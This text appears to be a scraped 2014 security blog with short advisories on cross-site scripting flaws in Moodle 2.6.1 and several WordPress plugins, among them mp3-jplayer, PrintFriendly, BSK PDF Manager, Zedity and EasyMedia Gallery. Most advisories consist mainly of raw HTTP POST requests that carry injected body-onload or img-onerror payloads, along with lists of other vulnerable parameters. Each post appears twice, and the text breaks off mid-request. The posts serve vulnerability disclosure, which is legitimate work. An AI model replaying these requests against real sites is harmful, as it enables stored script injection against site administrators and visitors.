During last tests I found that latest version of Moodle is vulnerable to XSS.
Check it out:
# ==============================================================
# Title ...| Moodle 2.6.1 XSS
# Version .| (Feb 27 2014) moodle-latest-26.zip
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....| http://download.moodle.org
# ==============================================================
[+] From admin user:
# ==============================================================
# 1. Persistent XSS
---<request>---
POST /k/cms/moodle/course/edit.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 988
returnto=topcat&mform_isexpanded_id_descriptionhdr=1&addcourseformatoptionshere=&enablecompletion=0&id=&sesskey=TCxmENhHwt&_qf__course_edit_form=1&mform_isexpanded_id_general=1&mform_isexpanded_id_courseformathdr=0&mform_isexpanded_id_appearancehdr=0&mform_isexpanded_id_filehdr=0&mform_isexpanded_id_enrol_guest_header_0=0&mform_isexpanded_id_groups=0&mform_isexpanded_id_rolerenaming=0&fullname=startowy&shortname=startowy&category=1&visible=1&startdate%5Bday%5D=28&startdate%5Bmonth%5D=2&startdate%5Byear%5D=2014&idnumber=&summary_editor%5Btext%5D=%3Cp%3Estartowy%3C%2Fp%3E&summary_editor%5Bformat%5D=1&summary_editor%5Bitemid%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&overviewfiles_filemanager=41075595&format=weeks&numsections=10&hiddensections=0&coursedisplay=0&lang=&newsitems=5&showgrades=1&showreports=0&maxbytes=0&enrol_guest_status_0=1&groupmode=0&groupmodeforce=0&defaultgroupingid=0&role_1=&role_2=&role_3=&role_4=&role_5=&role_6=&role_7=&role_8=&submitbutton=Save+changes
---<request>---
# ==============================================================
# 2. XSS
---<request>---
POST /k/cms/moodle/group/group.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 361
id=&courseid=5&sesskey=cik7wECmff&_qf__group_form=1&mform_isexpanded_id_general=1&name=aaaaaaaaaaaaaa&idnumber=&description_editor%5Btext%5D=%3Cp%3Eaaaaaaaaaaaaaaaaaaaaaaa%3C%2Fp%3E&description_editor%5Bformat%5D=1&description_editor%5Bitemid%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&enrolmentkey=&hidepicture=0&imagefile=801633198&submitbutton=Save+changes
---<request>---
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
Thursday, 27 February 2014
Wednesday, 26 February 2014
[EN] Multiple XSS in mp3-jplayer
# ==============================================================
# Title ...| Multiple XSS in mp3-jplayer
# Version .| mp3-jplayer.1.8.7
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================
# ==============================================================
# Multiple XSS
---<request>---
POST /k/wordpress/wp-admin/options-general.php?page=mp3jplayer.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 1441
mp3foxVol=100&make_player_from_link=true&mp3foxOnBlog=true&mp3foxTheme=styleF&mp3foxCustomStylesheet='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&mp3foxScreenOpac=&mp3foxScreenColour=&mp3foxLoadbarOpac=&mp3foxLoadbarColour=&mp3foxPosbarOpac=&mp3foxPosbarColour=&mp3foxPosbarTint=&mp3foxPlaylistOpac=&mp3foxPlaylistColour=&mp3foxPlaylistTint=&mp3foxIndicator=&mp3foxVolGrad=&mp3foxListDivider=&mp3foxScreenTextColour=&mp3foxListTextColour=&mp3foxListCurrentColour=&mp3foxListBGaCurrent=&mp3foxListHoverColour=&mp3foxListBGaHover=&mp3foxPopoutBackground=&mp3foxPopoutBGimage=&librarySortcol=file&libraryDirection=ASC&mp3foxfolder=%2F&mp3foxPlayerWidth=40%25&mp3foxFloat=none&mp3foxDownloadMp3=false&loggedout_dload_text=LOG+IN+TO+DOWNLOAD&loggedout_dload_link=http%3A%2F%2F10.149.14.62%2Fk%2Fwordpress%2Fwp-login.php&dload_text=DOWNLOAD+MP3&force_browser_dload=true&dloader_remote_path=&mp3foxPaddings_top=5px&mp3foxPaddings_inner=35px&mp3foxPaddings_bottom=40px&mp3foxMaxListHeight=450&mp3foxShowPlaylist=true&file_separator=%2C&caption_separator=%3B&mp3foxEnablePopout=true&mp3foxPopoutWidth=400&mp3foxPopoutMaxHeight=600&mp3foxPopoutButtonText=&mp3foxEncodeFiles=true&mp3foxAllowRemote=true&make_player_from_link_shcode=%5Bmp3j+track%3D%22%7BTEXT%7D%40%7BURL%7D%22+volslider%3D%22y%22+style%3D%22outline%22%5D&touch_punch_js=true&disableJSlibs=&update_mp3foxSettings=Update+Settings&mp3foxRemember=true&MtogBox1=false&mp3foxPluginVersion=1.8.7
---<request>---
Also vulnerable:
mp3foxScreenOpac, mp3foxScreenColour, mp3foxLoadbarOpac, mp3foxLoadbarColour, mp3foxPosbarOpac, mp3foxPosbarColour,
mp3foxPlaylistOpac, mp3foxPlaylistColour, mp3foxScreenTextColour, mp3foxListTextColour, mp3foxListCurrentColour, mp3foxListBGaCurrent, mp3foxListBGaCurrent, mp3foxListHoverColour, mp3foxListBGaHover, mp3foxPopoutBackground,
mp3foxPopoutBGimage, mp3foxPlayerWidth, mp3foxPlayerWidth, loggedout_dload_text, loggedout_dload_link, dload_text,
dloader_remote_path, mp3foxPaddings_top, mp3foxPaddings_inner, mp3foxPaddings_bottom, file_separator, caption_separator, mp3foxPopoutButtonText, make_player_from_link_shcode, MtogBox1
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
# Title ...| Multiple XSS in mp3-jplayer
# Version .| mp3-jplayer.1.8.7
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================
# ==============================================================
# Multiple XSS
---<request>---
POST /k/wordpress/wp-admin/options-general.php?page=mp3jplayer.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 1441
mp3foxVol=100&make_player_from_link=true&mp3foxOnBlog=true&mp3foxTheme=styleF&mp3foxCustomStylesheet='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&mp3foxScreenOpac=&mp3foxScreenColour=&mp3foxLoadbarOpac=&mp3foxLoadbarColour=&mp3foxPosbarOpac=&mp3foxPosbarColour=&mp3foxPosbarTint=&mp3foxPlaylistOpac=&mp3foxPlaylistColour=&mp3foxPlaylistTint=&mp3foxIndicator=&mp3foxVolGrad=&mp3foxListDivider=&mp3foxScreenTextColour=&mp3foxListTextColour=&mp3foxListCurrentColour=&mp3foxListBGaCurrent=&mp3foxListHoverColour=&mp3foxListBGaHover=&mp3foxPopoutBackground=&mp3foxPopoutBGimage=&librarySortcol=file&libraryDirection=ASC&mp3foxfolder=%2F&mp3foxPlayerWidth=40%25&mp3foxFloat=none&mp3foxDownloadMp3=false&loggedout_dload_text=LOG+IN+TO+DOWNLOAD&loggedout_dload_link=http%3A%2F%2F10.149.14.62%2Fk%2Fwordpress%2Fwp-login.php&dload_text=DOWNLOAD+MP3&force_browser_dload=true&dloader_remote_path=&mp3foxPaddings_top=5px&mp3foxPaddings_inner=35px&mp3foxPaddings_bottom=40px&mp3foxMaxListHeight=450&mp3foxShowPlaylist=true&file_separator=%2C&caption_separator=%3B&mp3foxEnablePopout=true&mp3foxPopoutWidth=400&mp3foxPopoutMaxHeight=600&mp3foxPopoutButtonText=&mp3foxEncodeFiles=true&mp3foxAllowRemote=true&make_player_from_link_shcode=%5Bmp3j+track%3D%22%7BTEXT%7D%40%7BURL%7D%22+volslider%3D%22y%22+style%3D%22outline%22%5D&touch_punch_js=true&disableJSlibs=&update_mp3foxSettings=Update+Settings&mp3foxRemember=true&MtogBox1=false&mp3foxPluginVersion=1.8.7
---<request>---
Also vulnerable:
mp3foxScreenOpac, mp3foxScreenColour, mp3foxLoadbarOpac, mp3foxLoadbarColour, mp3foxPosbarOpac, mp3foxPosbarColour,
mp3foxPlaylistOpac, mp3foxPlaylistColour, mp3foxScreenTextColour, mp3foxListTextColour, mp3foxListCurrentColour, mp3foxListBGaCurrent, mp3foxListBGaCurrent, mp3foxListHoverColour, mp3foxListBGaHover, mp3foxPopoutBackground,
mp3foxPopoutBGimage, mp3foxPlayerWidth, mp3foxPlayerWidth, loggedout_dload_text, loggedout_dload_link, dload_text,
dloader_remote_path, mp3foxPaddings_top, mp3foxPaddings_inner, mp3foxPaddings_bottom, file_separator, caption_separator, mp3foxPopoutButtonText, make_player_from_link_shcode, MtogBox1
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
[EN] XSS in PrintFriendly
# ==============================================================
# Title ...| XSS in PrintFriendly
# Version .| printfriendly 3.3.7
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================
# ==============================================================
# XSS
---<request>---
POST /k/wordpress/wp-admin/options.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 1389
option_page=printfriendly_option&action=update&_wpnonce=496ce7c4d4&_wp_http_referer=%2Fk%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dprintfriendly&printfriendly_option%5Bbutton_type%5D=pf-button.gif&printfriendly_option%5Bcustom_image%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&printfriendly_option%5Bcustom_text%5D=Print+Friendly&printfriendly_option%5Btext_color%5D=%236D9F00&printfriendly_option%5Btext_size%5D=14&printfriendly_option%5Bcontent_position%5D=left&printfriendly_option%5Bcontent_placement%5D=after&printfriendly_option%5Bmargin_left%5D=12&printfriendly_option%5Bmargin_right%5D=12&printfriendly_option%5Bmargin_top%5D=12&printfriendly_option%5Bmargin_bottom%5D=12&printfriendly_option%5Bshow_on_posts%5D=on&printfriendly_option%5Bshow_on_pages%5D=on&printfriendly_option%5Blogo%5D=favicon&printfriendly_option%5Bimage_url%5D=&printfriendly_option%5Btagline%5D=&printfriendly_option%5Bclick_to_delete%5D=0&printfriendly_option%5Bhide-images%5D=0&printfriendly_option%5Bimage-style%5D=right&printfriendly_option%5Bemail%5D=0&printfriendly_option%5Bpdf%5D=0&printfriendly_option%5Bprint%5D=0&printfriendly_option%5Bcustom_css_url%5D=&printfriendly_option%5Bwebsite_protocol%5D=http&printfriendly_option%5Bpassword_protected%5D=no&printfriendly_option%5Bjavascript%5D%3E=yes&printfriendly_option%5Benable_google_analytics%5D=no&printfriendly_option%5Bpf_algo%5D=wp
---<request>---
Also vulnerable: printfriendly_option%5Bcustom_text%5D
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
# Title ...| XSS in PrintFriendly
# Version .| printfriendly 3.3.7
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================
# ==============================================================
# XSS
---<request>---
POST /k/wordpress/wp-admin/options.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 1389
option_page=printfriendly_option&action=update&_wpnonce=496ce7c4d4&_wp_http_referer=%2Fk%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dprintfriendly&printfriendly_option%5Bbutton_type%5D=pf-button.gif&printfriendly_option%5Bcustom_image%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&printfriendly_option%5Bcustom_text%5D=Print+Friendly&printfriendly_option%5Btext_color%5D=%236D9F00&printfriendly_option%5Btext_size%5D=14&printfriendly_option%5Bcontent_position%5D=left&printfriendly_option%5Bcontent_placement%5D=after&printfriendly_option%5Bmargin_left%5D=12&printfriendly_option%5Bmargin_right%5D=12&printfriendly_option%5Bmargin_top%5D=12&printfriendly_option%5Bmargin_bottom%5D=12&printfriendly_option%5Bshow_on_posts%5D=on&printfriendly_option%5Bshow_on_pages%5D=on&printfriendly_option%5Blogo%5D=favicon&printfriendly_option%5Bimage_url%5D=&printfriendly_option%5Btagline%5D=&printfriendly_option%5Bclick_to_delete%5D=0&printfriendly_option%5Bhide-images%5D=0&printfriendly_option%5Bimage-style%5D=right&printfriendly_option%5Bemail%5D=0&printfriendly_option%5Bpdf%5D=0&printfriendly_option%5Bprint%5D=0&printfriendly_option%5Bcustom_css_url%5D=&printfriendly_option%5Bwebsite_protocol%5D=http&printfriendly_option%5Bpassword_protected%5D=no&printfriendly_option%5Bjavascript%5D%3E=yes&printfriendly_option%5Benable_google_analytics%5D=no&printfriendly_option%5Bpf_algo%5D=wp
---<request>---
Also vulnerable: printfriendly_option%5Bcustom_text%5D
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
[EN] XSS in Alpine PhotoTile for Instagram
# ==============================================================
# Title ...| XSS in Alpine PhotoTile for Instagram
# Version .| Alpine PhotoTile for Instagram 1.2.6.5
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================
# ==============================================================
# XSS
---<request>---
POST /k/wordpress/wp-admin/options-general.php?page=alpine-photo-tile-for-instagram-settings&tab=plugin-settings HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 300
hidden=Y&general_highlight_color=%2364a2d8&general_lightbox=alpine-fancybox&general_lightbox_params='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&general_block_users=&hidden_widget_alignment=1&cache_time=4&alpine-photo-tile-for-instagram-settings_plugin-settings%5Bsubmit-plugin-settings%5D=Save+Settings
---<request>---
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
# Title ...| XSS in Alpine PhotoTile for Instagram
# Version .| Alpine PhotoTile for Instagram 1.2.6.5
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================
# ==============================================================
# XSS
---<request>---
POST /k/wordpress/wp-admin/options-general.php?page=alpine-photo-tile-for-instagram-settings&tab=plugin-settings HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 300
hidden=Y&general_highlight_color=%2364a2d8&general_lightbox=alpine-fancybox&general_lightbox_params='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&general_block_users=&hidden_widget_alignment=1&cache_time=4&alpine-photo-tile-for-instagram-settings_plugin-settings%5Bsubmit-plugin-settings%5D=Save+Settings
---<request>---
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
[EN] XSS in Widget Control Powered By Everyblock
# ==============================================================
# Title ...| XSS in Widget Control Powered By Everyblock
# Version .| widget-control-powered-by-everyblock.1.0.1
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================
# ==============================================================
# XSS
---<request>---
POST /k/wordpress/wp-admin/admin.php?page=add-widget-slug HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 52
idDropdown='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e
---<request>---
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
# Title ...| XSS in Widget Control Powered By Everyblock
# Version .| widget-control-powered-by-everyblock.1.0.1
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================
# ==============================================================
# XSS
---<request>---
POST /k/wordpress/wp-admin/admin.php?page=add-widget-slug HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 52
idDropdown='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e
---<request>---
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
[EN] XSS in BSK PDF Manager
# ==============================================================
# Title ...| XSS in BSK PDF Manager
# Version .| bsk-pdf-manager 1.3
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================
# ==============================================================
# XSS
---<request>---
POST /k/wordpress/wp-admin/admin.php?page=bsk-pdf-manager&view=addnew HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 302
page=bsk-pdf-manager&view='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&cat_title=asdasd&bsk_pdf_manager_action=category_save&bsk_pdf_manager_category_id=-1&bsk_pdf_manager_category_save_oper_nonce=9977a95481&_wp_http_referer=%2Fk%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dbsk-pdf-manager%26view%3Daddnew
---<request>---
Also vulnerable is 'category->title'.
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
# Title ...| XSS in BSK PDF Manager
# Version .| bsk-pdf-manager 1.3
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================
# ==============================================================
# XSS
---<request>---
POST /k/wordpress/wp-admin/admin.php?page=bsk-pdf-manager&view=addnew HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 302
page=bsk-pdf-manager&view='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&cat_title=asdasd&bsk_pdf_manager_action=category_save&bsk_pdf_manager_category_id=-1&bsk_pdf_manager_category_save_oper_nonce=9977a95481&_wp_http_referer=%2Fk%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dbsk-pdf-manager%26view%3Daddnew
---<request>---
Also vulnerable is 'category->title'.
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
[EN] XSS in VideoWhisper Live Streaming
# ==============================================================
# Title ...| XSS in VideoWhisper Live Streaming
# Version .| 4.29.6
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================
# ==============================================================
# XSS
---<request>---
POST /k/wordpress/wp-admin/options-general.php?page=videowhisper_streaming.php&tab=premium HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 310
premiumList='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&canWatchPremium=all&watchListPremium=Super+Admin%2C+Administrator%2C+Editor%2C+Author%2C+Contributor%2C+Subscriber&pLogo=1&transcoding=1&alwaysRTMP=0&pBroadcastTime=0&pWatchTime=0&timeReset=30&pCamBandwidth=65536&pCamMaxBandwidth=163840&submit=Save+Changes
---<request>---
Also vulnerable: watchListPremium, pBroadcastTime, timeReset, pCamBandwidth
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
# Title ...| XSS in VideoWhisper Live Streaming
# Version .| 4.29.6
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================
# ==============================================================
# XSS
---<request>---
POST /k/wordpress/wp-admin/options-general.php?page=videowhisper_streaming.php&tab=premium HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 310
premiumList='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&canWatchPremium=all&watchListPremium=Super+Admin%2C+Administrator%2C+Editor%2C+Author%2C+Contributor%2C+Subscriber&pLogo=1&transcoding=1&alwaysRTMP=0&pBroadcastTime=0&pWatchTime=0&timeReset=30&pCamBandwidth=65536&pCamMaxBandwidth=163840&submit=Save+Changes
---<request>---
Also vulnerable: watchListPremium, pBroadcastTime, timeReset, pCamBandwidth
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
[EN] XSS in WP Post to PDF
# ==============================================================
# Title ...| XSS in WP Post to PDF
# Version .| wp-post-to-pdf.2.3.1
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================
# ==============================================================
# XSS
---<request>---
POST /k/wordpress/wp-admin/options.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 827
option_page=wpptopdf_options&action=update&_wpnonce=578db9a23d&_wp_http_referer=%2Fk%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-post-to-pdf%2Fwp-post-to-pdf.php&wpptopdf%5Bpost%5D=1&wpptopdf%5Bpage%5D=1&wpptopdf%5Binclude%5D=0&wpptopdf%5BexcludeThis%5D=&wpptopdf%5BincludeCache%5D=0&wpptopdf%5BexcludeThisCache%5D=&wpptopdf%5BiconPosition%5D=before&wpptopdf%5BimageIcon%5D=%3Cimg+alt%3D%22Download+PDF%22+src%3D%22http%3A%2F%2F10.149.14.62%2Fk%2Fwordpress%2Fwp-content%2Fplugins%2Fwp-post-to-pdf%2Fasset%2Fimages%2Fpdf.png%22%3E&wpptopdf%5BheaderFont%5D=helvetica&wpptopdf%5BheaderFontSize%5D=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(9999)%3e")&wpptopdf%5BfooterFont%5D=helvetica&wpptopdf%5BfooterFontSize%5D=10&wpptopdf%5BcontentFont%5D=helvetica&wpptopdf%5BcontentFontSize%5D=12&wpptopdf%5Bsubmit%5D=Save+Changes
---<request>---
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
# Title ...| XSS in WP Post to PDF
# Version .| wp-post-to-pdf.2.3.1
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================
# ==============================================================
# XSS
---<request>---
POST /k/wordpress/wp-admin/options.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 827
option_page=wpptopdf_options&action=update&_wpnonce=578db9a23d&_wp_http_referer=%2Fk%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-post-to-pdf%2Fwp-post-to-pdf.php&wpptopdf%5Bpost%5D=1&wpptopdf%5Bpage%5D=1&wpptopdf%5Binclude%5D=0&wpptopdf%5BexcludeThis%5D=&wpptopdf%5BincludeCache%5D=0&wpptopdf%5BexcludeThisCache%5D=&wpptopdf%5BiconPosition%5D=before&wpptopdf%5BimageIcon%5D=%3Cimg+alt%3D%22Download+PDF%22+src%3D%22http%3A%2F%2F10.149.14.62%2Fk%2Fwordpress%2Fwp-content%2Fplugins%2Fwp-post-to-pdf%2Fasset%2Fimages%2Fpdf.png%22%3E&wpptopdf%5BheaderFont%5D=helvetica&wpptopdf%5BheaderFontSize%5D=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(9999)%3e")&wpptopdf%5BfooterFont%5D=helvetica&wpptopdf%5BfooterFontSize%5D=10&wpptopdf%5BcontentFont%5D=helvetica&wpptopdf%5BcontentFontSize%5D=12&wpptopdf%5Bsubmit%5D=Save+Changes
---<request>---
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
Tuesday, 25 February 2014
[EN] Wordpress plugin Zedity vulnerable to XSS
# ==============================================================
# Title ...| Zedity XSS
# Version .| zedity.2.4.0
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================
# ==============================================================
# XSS
---<request>---
POST /k/wordpress/wp-admin/admin-ajax.php?action=zedity_ajax HTTP/1.1
Host: 10.149.14.62
(...)
Cache-Control: no-cache
zaction=<body onload=alert(123)>&id=&post_id=28&title=aaaaaaa&content=%3Cdiv+data-
origh%3D%22600%22+data-origw%3D%22600%22+style%3D%22position%3A+relative%3B+width%
3A+600px%3B+height%3A+600px%3B+overflow%3A+hidden%3B%22+class%3D%22zedity-editor+z
edity-notheme%22+id%3D%22zed_olgrv8%22%3E%3Cdiv+class%3D%22zedity-watermark%22+sty
le%3D%22display%3Anone%3Btop%3A0%3Bleft%3A0%3B%22+data-pos%3D%22none%22%3E%3Cspan+
style%3D%22color%3A%23ffd6ba%3Bfont-size%3A11px%3Bfont-family%3ATahoma%2CArial%2Cs
ans-serif%22%3EPowered+by+%3Ca+href%3D%22http%3A%2F%2Fzedity.com%22+target%3D%22_b
lank%22+style%3D%22font-size%3A11px%3Bfont-weight%3Abold%3Bcolor%3Awhite%3Bfont-fa
mily%3AVerdana%2CTahoma%3Btext-decoration%3Anone%3B%22%3EZedity%3C%2Fa%3E%3C%2Fspa
n%3E%3C%2Fdiv%3E%3C%2Fdiv%3E
---<request>---
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
# Title ...| Zedity XSS
# Version .| zedity.2.4.0
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================
# ==============================================================
# XSS
---<request>---
POST /k/wordpress/wp-admin/admin-ajax.php?action=zedity_ajax HTTP/1.1
Host: 10.149.14.62
(...)
Cache-Control: no-cache
zaction=<body onload=alert(123)>&id=&post_id=28&title=aaaaaaa&content=%3Cdiv+data-
origh%3D%22600%22+data-origw%3D%22600%22+style%3D%22position%3A+relative%3B+width%
3A+600px%3B+height%3A+600px%3B+overflow%3A+hidden%3B%22+class%3D%22zedity-editor+z
edity-notheme%22+id%3D%22zed_olgrv8%22%3E%3Cdiv+class%3D%22zedity-watermark%22+sty
le%3D%22display%3Anone%3Btop%3A0%3Bleft%3A0%3B%22+data-pos%3D%22none%22%3E%3Cspan+
style%3D%22color%3A%23ffd6ba%3Bfont-size%3A11px%3Bfont-family%3ATahoma%2CArial%2Cs
ans-serif%22%3EPowered+by+%3Ca+href%3D%22http%3A%2F%2Fzedity.com%22+target%3D%22_b
lank%22+style%3D%22font-size%3A11px%3Bfont-weight%3Abold%3Bcolor%3Awhite%3Bfont-fa
mily%3AVerdana%2CTahoma%3Btext-decoration%3Anone%3B%22%3EZedity%3C%2Fa%3E%3C%2Fspa
n%3E%3C%2Fdiv%3E%3C%2Fdiv%3E
---<request>---
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
[EN] Wordpress plugin EasyMedia Gallery vulnerable
# ==============================================================
# Title ...|EasyMedia Gallery XSS
# Version .| easy-media-gallery.1.2.29
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================
# ==============================================================
# EasyMedia Gallery XSS
---<request>---
POST /k/wordpress/wp-admin/edit.php?post_type=easymediagallery&page=emg_settings HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 1452
option_page=easy_options_group&action=update&_wpnonce=e4392a9119&_wp_http_referer=%2Fk%2Fwordpress%2Fwp-admin%2Fedit.php%3Fpost_type%3Deasymediagallery%26page%3Demg_settings&easymedia_columns=3&easymedia_alignstyle=Center&easymedia_img_size_limit='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&easymedia_vid_size%5Bwidth%5D=700&easymedia_vid_size%5Bheight%5D=400&easymedia_disen_autoplv=1&easymedia_disen_autopl=1&easymedia_disen_audio_loop=1&easymedia_audio_vol=100&easymedia_box_style=Light&easymedia_cur_style=Pointer&easymedia_mag_icon=Icon-0&easymedia_frm_size%5Bwidth%5D=160&easymedia_frm_size%5Bheight%5D=160&easymedia_frm_col=%23FFFFFF&easymedia_ttl_col=%23C7C7C7&easymedia_brdr_rds=3&easymedia_thumb_col=%23000000&easymedia_hover_opcty=40&easymedia_style_pattern=pattern-01.png&easymedia_disen_bor=1&easymedia_disen_hovstyle=1&save3=Save+Changes&easymedia_disen_plug=1&easymedia_disen_rclick=1&easymedia_disen_databk=1&easymedia_disen_admnotify=1&easymedia_disen_dasnews=1&easymedia_ajax_con_id=%23content&easymedia_plugin_core=core-1.4.5-min&easymedia_plugin_wpinfo=-+WP+Version+%3A+3.8.1%0D%0A-+EMG-Lite+Version+%3A+1.2.29%0D%0A-+Site+URL+%3A+http%3A%2F%2F10.149.14.62%2Fk%2Fwordpress%0D%0A-+WP+Multisite+%3A+NO%0D%0A-+PHP+Direct+Access+%3A+YES%0D%0A-+Memory+Limit+%3A+128+MB%0D%0A-+Active+Theme+%3A+Twenty+Fourteen%0D%0A-+Active+Plugins+%3A+%0D%0A+%C2%A0%C2%A0%C2%A0%C2%A0Easy+Media+Gallery%0D%0A+%C2%A0%C2%A0%C2%A0%C2%A0Zedity%0D%0A&action=save
---<request>---
Also vulnerable are: easymedia_vid_size%5Bwidth%5D, easymedia_vid_size%5Bheight%5D,
easymedia_frm_size%5Bwidth%5D, easymedia_ttl_col, easymedia_thumb_col,
easymedia_hover_opcty, easymedia_style_pattern, easymedia_ajax_con_id
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
# Title ...|EasyMedia Gallery XSS
# Version .| easy-media-gallery.1.2.29
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================
# ==============================================================
# EasyMedia Gallery XSS
---<request>---
POST /k/wordpress/wp-admin/edit.php?post_type=easymediagallery&page=emg_settings HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 1452
option_page=easy_options_group&action=update&_wpnonce=e4392a9119&_wp_http_referer=%2Fk%2Fwordpress%2Fwp-admin%2Fedit.php%3Fpost_type%3Deasymediagallery%26page%3Demg_settings&easymedia_columns=3&easymedia_alignstyle=Center&easymedia_img_size_limit='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&easymedia_vid_size%5Bwidth%5D=700&easymedia_vid_size%5Bheight%5D=400&easymedia_disen_autoplv=1&easymedia_disen_autopl=1&easymedia_disen_audio_loop=1&easymedia_audio_vol=100&easymedia_box_style=Light&easymedia_cur_style=Pointer&easymedia_mag_icon=Icon-0&easymedia_frm_size%5Bwidth%5D=160&easymedia_frm_size%5Bheight%5D=160&easymedia_frm_col=%23FFFFFF&easymedia_ttl_col=%23C7C7C7&easymedia_brdr_rds=3&easymedia_thumb_col=%23000000&easymedia_hover_opcty=40&easymedia_style_pattern=pattern-01.png&easymedia_disen_bor=1&easymedia_disen_hovstyle=1&save3=Save+Changes&easymedia_disen_plug=1&easymedia_disen_rclick=1&easymedia_disen_databk=1&easymedia_disen_admnotify=1&easymedia_disen_dasnews=1&easymedia_ajax_con_id=%23content&easymedia_plugin_core=core-1.4.5-min&easymedia_plugin_wpinfo=-+WP+Version+%3A+3.8.1%0D%0A-+EMG-Lite+Version+%3A+1.2.29%0D%0A-+Site+URL+%3A+http%3A%2F%2F10.149.14.62%2Fk%2Fwordpress%0D%0A-+WP+Multisite+%3A+NO%0D%0A-+PHP+Direct+Access+%3A+YES%0D%0A-+Memory+Limit+%3A+128+MB%0D%0A-+Active+